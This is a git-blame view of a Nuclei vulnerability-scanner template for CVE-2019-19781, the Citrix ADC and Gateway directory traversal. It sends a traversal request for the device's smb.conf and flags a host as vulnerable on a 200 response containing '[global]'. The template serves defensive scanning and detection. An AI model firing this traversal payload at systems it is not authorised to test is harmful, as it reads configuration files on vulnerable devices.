nuclei-templates/cves/2019/CVE-2019-19781.yaml

35 lines
906 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-19781
2020-04-05 22:27:04 +00:00
info:
name: Citrix ADC and Gateway - Directory Traversal
2022-02-16 19:14:13 +00:00
author: organiccrap,geeknik
severity: critical
description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.
reference:
- https://support.citrix.com/article/CTX267027
- https://nvd.nist.gov/vuln/detail/CVE-2019-19781
- https://www.kb.cert.org/vuls/id/619785
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-19781
cwe-id: CWE-22
tags: cve,cve2019,citrix,lfi,kev
2020-04-05 22:27:04 +00:00
requests:
- method: GET
2020-05-25 07:49:06 +00:00
path:
2020-04-05 22:27:04 +00:00
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
2022-02-16 19:24:50 +00:00
matchers-condition: and
2020-04-05 22:27:04 +00:00
matchers:
- type: status
status:
- 200
2022-02-16 19:24:50 +00:00
2020-04-05 22:27:04 +00:00
- type: word
2020-05-25 07:49:06 +00:00
words:
- "[global]"
# Enhanced by mp on 2022/05/03